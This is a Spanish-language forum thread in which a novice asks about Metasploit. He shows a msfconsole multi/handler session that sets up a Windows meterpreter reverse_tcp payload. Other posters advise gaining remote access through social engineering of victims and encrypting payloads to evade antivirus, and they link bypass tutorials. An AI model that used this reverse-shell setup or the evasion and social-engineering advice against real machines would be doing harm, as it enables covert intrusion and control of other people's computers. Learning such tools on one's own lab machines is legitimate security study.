Pregunta metasploit v3.7.1-release

[VIPbie]

Hola hola!
Quisiera hacerle unas preguntas relacionadas con el uso de esta herramienta.
Estoy apenas relacionándome con ella, recien tengo BT5. y estoy haciendo  pruebas con mis equipos.
Siguiendo un tutorial,  cree el ejecutable con

set PAYLOAD windows/meterpreter/reverse_tcp

Luego con el Msfconsole: use exploit/multi/handler

y pues le hago todo segun el manual, lo meto en una usb y lo ejecuto en la maquina W. enseguida me dió el control absoluto y puedo hacer lo q desee ahi..

Mi pregunta es: esto se puede hacer esto sin que tenga el acceso fisico a la maquina y sin tener que desactivar el AV?

Gracias x cualquier info.

[WebRipper]

hola, estoy casi en las mismas que vos, no se nada pero si pudieras decirme donde encontrar el tutorial ese que tenes estaria agradecido. Por otra parte te recomiendo que postees en los talleres de hacking que hay por el foro.

[Hakr]

por supuesto! es mas facil usando algo de Ing. Social, lo mas comun es fingir problemas para incentivar el sentimiento de ayuda depende claro de la relacion que se tenga con las personas, si tenes un status social mas elevado la autoridad seria lo mas sencillo. si preferis la manera dura de hacer las cosas les recomiendo leer este tutorial muy extensivo y buenisimo de los creadores de metasploit => http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training el unico problema es que esta en ingles, pero aun asi se aprende muchisimo.

deberias investigar a lo sumo toda la informacion que podas recopilar sobre la maquina victima para asi tener alguna idea de como explotar el sistema, aunque recorda que el sistema mas vulnerable es el humano, suerte! no te olvides de cifrar el payload para que sea indetectable a los antivirus.

[VIPbie]

Uy espera ahí Hakr , como se cifra el payload para que sea indetectable a los antivirus?? eso sí no lo sabía!

no se nada pero si pudieras decirme donde encontrar el tutorial ese que tenes estaria agradecido.

WebRipper, cuando dije: 'según el manual' me refería a lo que leí en muchísimos manuales que he encontrado tanto en youtube como en paginas especializadas, he seguido al pie de la letra, he recogido una recopilación de posts, videos y cosas; sobre todo estoy leyendo mucho y tratando de comprender muchas cosas, es complejo pero me encanta!

[VIPbie]

Hay otra cosa que quisiera saber...
Estoy haciendo unas pruebas despues de usar el nmap. Cuando me sale lo siguiente, ¿qué significa exactamente?
Handler failed to bind to...xxx.xxx.xxx.xxx
¿Qué es lo que está fallando ahí?

[Hakr]

que raro, podrias poner una toma del scan a ver que es lo que pasa? podrias revisar si tienes winpcap instalado o si tienes bien configurado las opciones del nmap.

[VIPbie]

Estoy haciendo pruebas en mis maquinas y ....miren, la cosa va por aquí:

msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.0.5
LHOST => 192.168.0.5
msf exploit(handler) > set LPORT 5555
LPORT => 5555
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set EndOnSession false
EndOnSession => false
msf exploit(handler) > set RHOST 192.168.0.7
RHOST => 192.168.0.7
msf exploit(handler) > set RPORT 4244
RPORT => 4244
msf exploit(handler) > exploit

• Started reverse handler on 192.168.0.5:5555
  
• Starting the payload handler...
  
  Y ahí se queda...
  En los tutoriales que he visto, arroja enseguida una conexión....
  ¿Que no esto teniendo en cuenta?
  

[.:UND3R:.]

Podría ser el firewall o router?

en realidad no sé

[Hakr]

VIPbie que tipo de vulnerabilidad estas atacando? estas atacando a una maquina como "Client-Side" o directamente sin la interaccion del cliente?

aqui esta la info de como pasar los antivirus => http://www.offensive-security.com/metasploit-unleashed/Antivirus_Bypass

[VIPbie]

Hakr, ya estoy mirando como pasar los AV's es posible que sea eso. Voy a  ver que resultados me siguen dando esas pruebas. gracias.